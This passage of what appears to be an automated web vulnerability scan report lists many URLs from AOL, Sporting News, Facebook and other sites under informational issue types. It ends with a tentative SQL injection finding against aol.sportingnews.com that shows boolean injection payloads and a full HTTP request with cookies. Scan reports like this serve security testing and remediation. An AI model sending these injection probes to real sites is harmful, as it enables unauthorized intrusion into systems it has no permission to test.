28.632. http://www.facebook.com/plugins/send.php

28.633. http://www.facebook.com/plugins/send.php

28.634. http://www.facebook.com/plugins/send.php

28.635. http://www.facebook.com/plugins/send.php

28.636. http://www.facebook.com/plugins/send.php

28.637. http://www.facebook.com/plugins/send.php

28.638. http://www.facebook.com/plugins/send.php

28.639. http://www.facebook.com/plugins/send.php

28.640. http://www.facebook.com/plugins/send.php

28.641. http://www.facebook.com/plugins/send.php

28.642. http://www.facebook.com/plugins/send.php

28.643. http://www.facebook.com/plugins/send.php

28.644. http://www.facebook.com/plugins/send.php

28.645. http://www.facebook.com/plugins/send.php

28.646. http://www.facebook.com/plugins/send.php

28.647. http://www.facebook.com/plugins/send.php

28.648. http://www.facebook.com/plugins/send.php

28.649. http://www.facebook.com/plugins/send.php

28.650. http://www.facebook.com/plugins/send.php

28.651. http://www.facebook.com/plugins/send.php

28.652. http://www.facebook.com/plugins/send.php

28.653. http://www.facebook.com/plugins/send.php

28.654. http://www.facebook.com/plugins/send.php

28.655. http://www.facebook.com/plugins/send.php

28.656. http://www.facebook.com/plugins/send.php

28.657. http://www.facebook.com/plugins/send.php

28.658. http://www.facebook.com/plugins/send.php

28.659. http://www.facebook.com/plugins/send.php

28.660. http://www.facebook.com/plugins/send.php

28.661. http://www.facebook.com/plugins/send.php

28.662. http://www.facebook.com/plugins/send.php

28.663. http://www.facebook.com/plugins/send.php

28.664. http://www.facebook.com/plugins/send.php

28.665. http://www.facebook.com/plugins/send.php

28.666. http://www.facebook.com/plugins/send.php

28.667. http://www.facebook.com/plugins/send.php

28.668. http://www.facebook.com/plugins/send.php

28.669. http://www.facebook.com/plugins/send.php

28.670. http://www.facebook.com/plugins/send.php

28.671. http://www.facebook.com/plugins/send.php

28.672. http://www.facebook.com/plugins/send.php

28.673. http://www.facebook.com/plugins/send.php

28.674. http://www.facebook.com/plugins/send.php

28.675. http://www.facebook.com/plugins/send.php

28.676. http://www.facebook.com/plugins/send.php

28.677. http://www.facebook.com/plugins/send.php

28.678. http://www.facebook.com/plugins/send.php

28.679. http://www.facebook.com/plugins/send.php

28.680. http://www.facebook.com/plugins/send.php

28.681. http://www.facebook.com/plugins/send.php

28.682. http://www.facebook.com/plugins/send.php

28.683. http://www.facebook.com/plugins/send.php

28.684. http://www.facebook.com/plugins/send.php

28.685. http://www.facebook.com/plugins/send.php

28.686. http://www.facebook.com/plugins/send.php

28.687. http://www.facebook.com/plugins/send.php

28.688. http://www.facebook.com/plugins/send.php

28.689. http://www.facebook.com/plugins/send.php

28.690. http://www.facebook.com/policy.php

28.691. http://www.facebook.com/privacy/explanation.php

28.692. http://www.facebook.com/profile.php

28.693. http://www.facebook.com/profile.php

28.694. http://www.facebook.com/profile.php

28.695. http://www.facebook.com/r.php

28.696. http://www.facebook.com/r.php

28.697. http://www.facebook.com/r.php

28.698. http://www.facebook.com/r.php

28.699. http://www.facebook.com/r.php

28.700. http://www.facebook.com/recover.php

28.701. http://www.facebook.com/recover.php

28.702. http://www.facebook.com/recover.php

28.703. http://www.facebook.com/robynalys

28.704. http://www.facebook.com/share.php

28.705. http://www.facebook.com/share.php

28.706. http://www.facebook.com/share.php

28.707. http://www.facebook.com/sharer.php

28.708. http://www.facebook.com/sharer.php

28.709. http://www.facebook.com/sharer.php

28.710. http://www.facebook.com/sharer.php

28.711. http://www.facebook.com/skdarealist

28.712. http://www.facebook.com/sportingnews

28.713. http://www.facebook.com/stefanoboscolomarchi

28.714. http://www.facebook.com/techcrunch

28.715. http://www.facebook.com/terms.php

28.716. http://www.facebook.com/terms.php

28.717. http://www.facebook.com/terms.php

28.718. http://www.facebook.com/terms.php

28.719. http://www.facebook.com/theteebers

28.720. http://www.facebook.com/wmoppert

28.721. https://www.facebook.com/

28.722. https://www.facebook.com/

28.723. https://www.facebook.com/ajax/intl/language_dialog.php

28.724. https://www.facebook.com/ajax/intl/language_dialog.php

28.725. https://www.facebook.com/ajax/intl/language_dialog.php

28.726. https://www.facebook.com/captcha/tfbimage.php

28.727. https://www.facebook.com/favicon.ico

28.728. https://www.facebook.com/favicon.ico

28.729. https://www.facebook.com/h02332

28.730. https://www.facebook.com/h02332

28.731. https://www.facebook.com/h02332

28.732. https://www.facebook.com/help/contact.php

28.733. https://www.facebook.com/login.php

28.734. https://www.facebook.com/login.php

28.735. https://www.facebook.com/login.php

28.736. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.737. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

28.738. https://www.facebook.com/pages/create.php

28.739. https://www.facebook.com/pages/create.php

28.740. https://www.facebook.com/pages/create.php

28.741. https://www.facebook.com/r.php

28.742. https://www.facebook.com/r.php

28.743. https://www.facebook.com/r.php

28.744. https://www.facebook.com/recover.php

28.745. https://www.facebook.com/recover.php

28.746. http://www.google.com/sdch/rU20-FBA.dct

29. Credit card numbers disclosed

29.1. http://aol.sportingnews.com/

29.2. http://aol.sportingnews.com/

29.3. http://www.facebook.com/directory/pages/

29.4. http://www.facebook.com/directory/people/

30. Robots.txt file

30.1. http://404-bgd-511.mktoresp.com/webevents/visitWebPage

30.2. http://a0.twimg.com/profile_images/1115304440/eiNu5UkN_normal

30.3. http://abcnews.go.com/Entertainment/popup

30.4. http://ad.doubleclick.net/ad/N4873.AOL.com/B5465585.3

30.5. http://ads.pointroll.com/PortalServe/

30.6. http://ads.undertone.com/afr.php

30.7. https://adwords.google.com/select/Login

30.8. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

30.9. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

30.10. http://aol.worldwinner.com/cgi/welcome/21sie

30.11. http://aolmobile.aol.com/registration/welcome

30.12. http://aolmobile.aolcdn.com/favicon.ico

30.13. http://aolproductcentral.aol.com/ClickBroker

30.14. https://aolproductcentral.aol.com/ClickBroker

30.15. http://apartments.rentedspaces.oodle.com/

30.16. http://api.adcopy.com/papi/challenge.ajax

30.17. http://api.local.yahoo.com/MapsService/V1/geocode

30.18. http://api.twitter.com/receiver.html

30.19. http://ar-ar.facebook.com/login.php

30.20. http://ar.atwola.com/atd

30.21. http://archive.constantcontact.com/fs060/1101663036970/archive/1102715603213.html

30.22. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x600

30.23. https://at.atwola.com/

30.24. http://autocomplete.search.aol.com/autocomplete/get

30.25. http://ax.itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast

30.26. http://b.scorecardresearch.com/b

30.27. http://b.trymedia.com/b/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup

30.28. http://b.voicefive.com/b

30.29. http://blog.mapquest.com/

30.30. http://blogsearch.google.com/

30.31. http://bongo.zoomin.tv/videoplayer/skins/999/aol/AOLPlayer.swf

30.32. http://books.google.com/bkshp

30.33. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.34. http://c.brightcove.com/services/viewer/federated_f9

30.35. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

30.36. http://cheetah.vizu.com/a.gif

30.37. http://clients1.google.com/webpagethumbnail

30.38. http://clk.atdmt.com/go/253735228/direct

30.39. http://cm.g.doubleclick.net/pixel

30.40. http://content.mqcdn.com/winston-release17-64/cdn/dotcom3/images/logos/favicon.ico

30.41. http://d.tradex.openx.com/afr.php

30.42. http://d.trymedia.com/d/iwin/dip_30m_en/t_01ac1/FamilyFeud_Setup.rga

30.43. http://d.xp1.ru4.com/um

30.44. http://d1.openx.org/spcjs.php

30.45. http://daol.aol.com/software/

30.46. http://dev.aol.com/

30.47. http://digg.com/submit

30.48. http://docs.google.com/

30.49. http://fantasysource.sportingnews.com/baseball/free

30.50. http://features.mapquest.com/toolbar/

30.51. http://feedburner.google.com/fb/a/mailverify

30.52. http://feeds.bbci.co.uk/news/rss.xml

30.53. http://fls.doubleclick.net/activityi

30.54. http://fusion.google.com/add

30.55. http://googleads.g.doubleclick.net/aclk

30.56. http://graph.facebook.com/10134017/picture

30.57. http://gravatar.com/profiles/edit/

30.58. http://groups.google.com/groups

30.59. http://huffingtonpost.search.aol.com/search

30.60. http://images.apple.com/global/nav/scripts/globalnav.js

30.61. http://img-cdn.mediaplex.com/0/14302/119028/TC_OLE_results_art_125x125.gif

30.62. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_MdayspecchocMdelightUltmdg.js

30.63. http://itunes.apple.com/app/sporting-news-pro-football/id300213367

30.64. http://l.addthiscdn.com/live/t00/250lo.gif

30.65. http://m.twitter.com/favicon.ico

30.66. http://mail.aol.com/

30.67. http://mail.google.com/mail/

30.68. https://maps-api-ssl.google.com/maps

30.69. http://maps.google.com/maps

30.70. http://market.android.com/details

30.71. http://metrics.apple.com/b/ss/applesuperglobal/1/H.20.3/s72248036712408

30.72. http://mobile.aol.com/

30.73. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm

30.74. http://music.aol.com/radioguide/bb

30.75. https://new.aol.com/productsweb/

30.76. http://news.google.com/news/story

30.77. http://newsfeed.time.com/2011/05/04/do-chicks-and-fans-really-dig-the-long-ball-why-no-hitters-arent-drawing-crowds/

30.78. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

30.79. http://o.sa.aol.com/b/ss/aolcommem,aolsvc/1/H.21/s32818515414837

30.80. http://pagead2.googlesyndication.com/pagead/imgad

30.81. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

30.82. http://pixel.quantserve.com/pixel

30.83. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

30.84. http://pr.atwola.com/promoimp/100223980xx1201730986/aol

30.85. http://pubads.g.doubleclick.net/gampad/ads

30.86. http://puma.vizu.com/cdn/00/00/15/44/smart_tag.js

30.87. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

30.88. http://realestate.aol.com/

30.89. http://realestate.search.aol.com/search

30.90. https://rsp.web.aol.com/rsp-websvc-3.0/snsReg

30.91. http://s.gravatar.com/js/gprofiles.js

30.92. http://s0.wp.com/wp-content/themes/h4/global.css

30.93. http://s1.wp.com/wp-includes/js/jquery/jquery.js

30.94. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css

30.95. http://safebrowsing.clients.google.com/safebrowsing/downloads

30.96. http://scholar.google.com/schhp

30.97. http://search.aol.com/aol/imagehome

30.98. http://search.twitter.com/search

30.99. http://segment-pixel.invitemedia.com/pixel

30.100. http://sites.google.com/

30.101. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/861892/jlo-300x250-dl.jpg

30.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

30.103. http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html

30.104. https://spreadsheets.google.com/viewform

30.105. http://st.snimg.com/js/cinesport/nocontainer.js

30.106. http://static.ak.fbcdn.net/connect/xd_proxy.php

30.107. http://static.twitter.com/images/default_profile_normal.png

30.108. http://tacoda-fatcat.search.aol.com/fa/eval

30.109. http://tcr.tynt.com/javascripts/Tracer.js

30.110. http://techcrunch.com/

30.111. http://themes.googleusercontent.com/image

30.112. http://toolbarqueries.clients.google.com/tbproxy/af/query

30.113. http://translate.google.com/

30.114. http://translate.googleapis.com/translate_a/t

30.115. http://twitter.com/home

30.116. https://twitter.com/signup

30.117. http://video.aol.com/searchresults

30.118. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

30.119. http://video.google.com/

30.120. http://webcache.googleusercontent.com/search

30.121. http://webmail.aol.com/

30.122. http://widgets.digg.com/buttons/count

30.123. http://wireless.mapquest.com/

30.124. http://www.aolnews.com/

30.125. http://www.apple.com/itunes/affiliates/download/

30.126. http://www.bankrate.com/funnel/mortgages/

30.127. http://www.blogger.com/blog-post-reactions.g

30.128. http://www.citysbest.com/

30.129. http://www.cloudscan.me/

30.130. http://www.crunchboard.com/opening/detailjob.php

30.131. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.132. http://www.dailyfinance.com/

30.133. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.134. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

30.135. http://www.facebook.com/extern/login_status.php

30.136. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

30.137. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.138. http://www.fiddler2.com/fiddler2/updatecheck.asp

30.139. http://www.flickr.com/badge_code_v2.gne

30.140. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

30.141. http://www.games.com/game/family-feud/

30.142. https://www.godaddy.com/

30.143. http://www.google-analytics.com/__utm.gif

30.144. http://www.google.com/aclk

30.145. http://www.googleadservices.com/pagead/conversion/1034849195/

30.146. http://www.huffingtonpost.com/

30.147. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

30.148. http://www.mapquest.com/

30.149. http://www.marketwatch.com/News/Story/Story.aspx

30.150. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

30.151. http://www.moviefone.com/

30.152. https://www.neodata.com/pub/snew/new_print.shtml

30.153. http://www.netvibes.com/subscribe.php

30.154. http://www.newsgator.com/ngs/subscriber/subext.aspx

30.155. http://www.popeater.com/

30.156. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

30.157. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

30.158. http://www.truveo.com/search

30.159. http://www.tuaw.com/hub/app-reviews

30.160. http://xml.truveo.com/apiv3

30.161. http://yellowpages.aol.com/

31. Cacheable HTTPS response

31.1. https://account.login.aol.com/_cqr/registration/fetchRegImage

31.2. https://api.screenname.aol.com/

31.3. https://maps-api-ssl.google.com/maps

31.4. https://new.aol.com/productsweb/WordVerImage

31.5. https://secure.opinionlab.com/ccc01/comment_card.asp

31.6. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

31.7. https://us.etrade.com/e/t/welcome/whychooseetrade

31.8. https://www.facebook.com/ajax/intl/language_dialog.php

31.9. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

31.10. https://www.fightmagazine.com/mma-magazine/subscribe.asp

31.11. https://www.neodata.com/pub/snew/new_print.shtml

32. HTML does not specify charset

32.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

32.2. http://480-adver-view.c3metrics.com/v.js

32.3. http://abcnews.go.com/Entertainment/popup

32.4. https://account.login.aol.com/_cqr/registration/fetchRegImage

32.5. http://ad.doubleclick.net/clk

32.6. http://ads.pointroll.com/PortalServe/

32.7. http://ads.undertone.com/c

32.8. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

32.9. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

32.10. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php

32.11. http://aol.sportingnews.com/services/sn-promos/snt_promo_spot.php

32.12. http://aol.sportingnews.com/services/sn-promos/yearbooks.php

32.13. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250

32.14. http://browser.cdn.aol.com/customie8/aol/download.html

32.15. http://browsers.aol.com/customfirefox/aol/download.html

32.16. http://browsers.aol.com/customie/aol/download.html

32.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.18. http://cdn.at.atwola.com/_media/uac/tcode3.html

32.19. http://d.xp1.ru4.com/um

32.20. http://eatps.web.aol.com:9000/open_web_adhoc

32.21. http://fantasysource.sportingnews.com/baseball/free

32.22. http://fantasysource.sportingnews.com/baseball/promo

32.23. http://fantasysource.sportingnews.com/baseball/rankings

32.24. http://feedback.aol.com/help/newaolcom/

32.25. http://fls.doubleclick.net/activityi

32.26. http://fonts.citysbest.com/k/uni0vle-e.css

32.27. http://hostedusa3.whoson.com/include.js

32.28. http://image3.pubmatic.com/AdServer/UPug

32.29. http://js.adsonar.com/js/pass.html

32.30. http://legal.aol.com/TOS/

32.31. http://legal.aol.com/copyright-reporting/

32.32. http://mobile.aol.com/supported-carriers/

32.33. http://music.aol.com/_uac/adpage.html

32.34. http://music.aol.com/proxy/promo/

32.35. https://new.aol.com/productsweb/

32.36. https://new.aol.com/productsweb/WordVerAudio.mp3

32.37. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

32.38. http://o.aolcdn.com/art/merge/

32.39. http://o.aolcdn.com/cdn.webmail.aol.com/mailtour/aol/en-us/index.htm

32.40. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

32.41. http://ping.chartbeat.net/ping

32.42. http://pixel.quantserve.com/seg/r

32.43. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

32.44. http://privacy.aol.com/

32.45. http://r.nexac.com/e/getdata.xgi

32.46. http://realestate.aol.com/_uac/adpage.html

32.47. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

32.48. http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png

32.49. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html

32.50. http://toolbar.aol.com/index.adp

32.51. http://top-sec.net/

32.52. http://uac.advertising.com/wrapper/aceUACping.htm

32.53. https://us.etrade.com/e/t/welcome/whychooseetrade

32.54. http://view.c3metrics.com/c3VTabstrct-6-2.php

32.55. http://view.c3metrics.com/v.js

32.56. http://www.aol.com/ads/load_v7.html

32.57. http://www.dailyfinance.com/_uac/adpage.html

32.58. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

32.59. http://www.mapquest.com/cdn/_uac/adpage.htm

32.60. http://www.mmafighting.com/_uac/adpage.html

32.61. https://www.neodata.com/pub/snew/new_print.shtml

32.62. http://www.opselect.com/ad_feedback/survey.adp

32.63. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

33. HTML uses unrecognised charset

33.1. https://secure.opinionlab.com/ccc01/comment_card.asp

33.2. http://top-sec.net/quran/

33.3. http://top-sec.net/vb/

33.4. http://top-sec.net/vb/calendar.php

33.5. http://top-sec.net/vb/external.php

33.6. http://top-sec.net/vb/faq.php

33.7. http://top-sec.net/vb/forumdisplay.php

33.8. http://top-sec.net/vb/index.php

33.9. http://top-sec.net/vb/login.php

33.10. http://top-sec.net/vb/member.php

33.11. http://top-sec.net/vb/memberlist.php

33.12. http://top-sec.net/vb/online.php

33.13. http://top-sec.net/vb/post_thanks.php

33.14. http://top-sec.net/vb/profile.php

33.15. http://top-sec.net/vb/register.php

33.16. http://top-sec.net/vb/search.php

33.17. http://top-sec.net/vb/sendmessage.php

33.18. http://top-sec.net/vb/showgroups.php

33.19. http://top-sec.net/vb/showthread.php

33.20. http://top-sec.net/vb/tags.php

34. Content type incorrectly stated

34.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

34.2. http://480-adver-view.c3metrics.com/v.js

34.3. http://a1.twimg.com/profile_images/278881234/krugman_75_twitter_normal.gif

34.4. http://a1.twimg.com/profile_images/345739587/brand_normal.gif

34.5. http://a12.alphagodaddy.com/

34.6. http://a2.twimg.com/profile_images/254909555/NGTTwit3_normal.gif

34.7. http://a2.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg

34.8. http://a3.twimg.com/profile_images/323333673/twitterProfilePhoto_normal.jpg

34.9. https://account.login.aol.com/_cqr/registration/fetchRegImage

34.10. http://ad.doubleclick.net/clk

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1304557102**

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/557100472

34.13. http://ads.pointroll.com/PortalServe/

34.14. http://aka-cdn-ns.adtechus.com/images/445/Ad0St1Sz6Sq0V1Id20183485.jpg

34.15. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

34.16. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

34.17. http://an.tacoda.net/an/

34.18. http://api.screenname.aol.com/auth/getToken

34.19. https://api.screenname.aol.com/auth/getInfo

34.20. https://api.screenname.aol.com/auth/getToken

34.21. https://api.screenname.aol.com/auth/logout

34.22. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

34.23. http://ar.voicefive.com/b/rc.pli

34.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

34.25. http://ct.buzzfeed.com/wd/UserWidget

34.26. http://dev.aol.com/themes/zen/dac_2009/favicon.ico

34.27. http://eatps.web.aol.com:9000/open_web_adhoc

34.28. http://help.aol.com/help/img/vanessa_m_1._account_management

34.29. http://hostedusa3.whoson.com/include.js

34.30. http://image3.pubmatic.com/AdServer/UPug

34.31. http://images.apple.com/global/nav/scripts/globalnav.js

34.32. http://imgs.zinio.com/magimages/500399021/2011/416168844_170.jpg

34.33. http://mobile.aol.com/supported-carriers/

34.34. http://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.35. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

34.36. http://o.aolcdn.com/art/asylum_men/2009_main_transparent_black

34.37. http://o.aolcdn.com/art/dynanews/advertisement

34.38. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow

34.39. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-lt

34.40. http://o.aolcdn.com/art/dynanews/lbg-drop-shadow-rt

34.41. http://o.aolcdn.com/art/dynanews/lbg-photo-icon

34.42. http://o.aolcdn.com/art/merge

34.43. http://o.aolcdn.com/art/merge/

34.44. http://o.aolcdn.com/bill.aol.com

34.45. http://o.aolcdn.com/bill.aol.com/help/help_rev

34.46. http://o.aolcdn.com/bill.aol.com/help/help_rev/images/bubbles_faint_bg.jpg

34.47. http://o.aolcdn.com/billqa.aol.com

34.48. http://o.aolcdn.com/favicon.ico

34.49. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico

34.50. http://o.aolcdn.com/os_merge/

34.51. http://o.aolcdn.com/smartbox/SBG/REST/

34.52. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.ttf

34.53. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibriz.woff

34.54. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.eot

34.55. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.ttf

34.56. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold/Calibrib.woff

34.57. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.eot

34.58. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.ttf

34.59. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-italic/Calibrii.woff

34.60. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.eot

34.61. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.ttf

34.62. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri/Calibri.woff

34.63. http://pglb.buzzfed.com/10032/f4f3ccafe3fc01872a82127ebf3deddd

34.64. http://portalblog.aol.com/media/background_new.gif

34.65. http://r.nexac.com/e/getdata.xgi

34.66. http://realestate.search.aol.com/search

34.67. http://search.aol.com/aol/search

34.68. http://search.aol.com/aol/webhome

34.69. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

34.70. http://thumbnails.truveo.com/0019/0E/13/0E1365BA2F9FA0F2C672AB.jpg

34.71. http://thumbnails.truveo.com/0020/0D/02/0D02FB96964419B5B0548A.jpg

34.72. http://thumbnails.truveo.com/0020/65/BD/65BDA59B21148561B976CC.jpg

34.73. http://thumbnails.truveo.com/0020/7B/34/7B34DB70619895BDBA34C0.jpg

34.74. http://thumbnails.truveo.com/0021/53/1E/531E0C1223B27E297B70E5.jpg

34.75. http://thumbnails.truveo.com/0021/5F/D7/5FD79EA05AC04C8AC6F691.jpg

34.76. http://thumbnails.truveo.com/0022/50/81/5081FA28D8EB874CDF4710.jpg

34.77. http://thumbnails.truveo.com/0022/F1/31/F13153246C8EEA834ADD3E.jpg

34.78. http://thumbnails.truveo.com/0023/5E/0F/5E0F7F3A07E50EE46C2AF7.jpg

34.79. http://thumbnails.truveo.com/0023/B4/60/B46071BFD52CDE2AA71695.jpg

34.80. http://toolbar.aol.com/favicon.ico

34.81. http://translate.googleapis.com/translate_a/t

34.82. http://twitter.com/account/available_features

34.83. http://urls.api.twitter.com/1/urls/count.json

34.84. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

34.85. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

34.86. http://view.c3metrics.com/c3VTabstrct-6-2.php

34.87. http://view.c3metrics.com/v.js

34.88. http://www.aol.com/ajax.jsp

34.89. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

34.90. http://www.facebook.com/extern/login_status.php

34.91. http://www.fiddler2.com/fiddler2/updatecheck.asp

34.92. http://www.google.com/buzz/api/button.js

34.93. http://www.huffingtonpost.com/ads/check_flights.php

34.94. http://www.huffingtonpost.com/badge/badges_json_v2.php

34.95. http://www.huffingtonpost.com/include/mod_times.php

34.96. http://www.mapquest.com/_svc/searchio

34.97. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

34.98. http://www.metricstream.com/js/functions_newweb.js

34.99. http://www.metricstream.com/js/functions_web.js

34.100. http://www.res-x.com/ws/r2/Resonance.aspx

34.101. http://www.websitealive8.com/1245/Visitor/vTracker_v2.asp

35. Content type is not specified

35.1. http://ad.yieldmanager.com/st

35.2. http://widgets.digg.com/buttons/count

35.3. http://www.marketwatch.com/News/Story/Story.aspx

35.4. http://www.metricstream.com/favicon.ico



1. SQL injection  next
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
